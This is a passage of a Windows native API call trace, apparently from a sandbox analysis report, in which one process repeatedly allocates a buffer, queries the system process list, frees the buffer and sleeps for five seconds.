BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.086] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.101] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.149] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.167] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.179] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.197] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.212] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.228] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.243] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.277] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.293] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.308] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.320] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.338] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.351] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.367] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.384] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.398] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.445] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 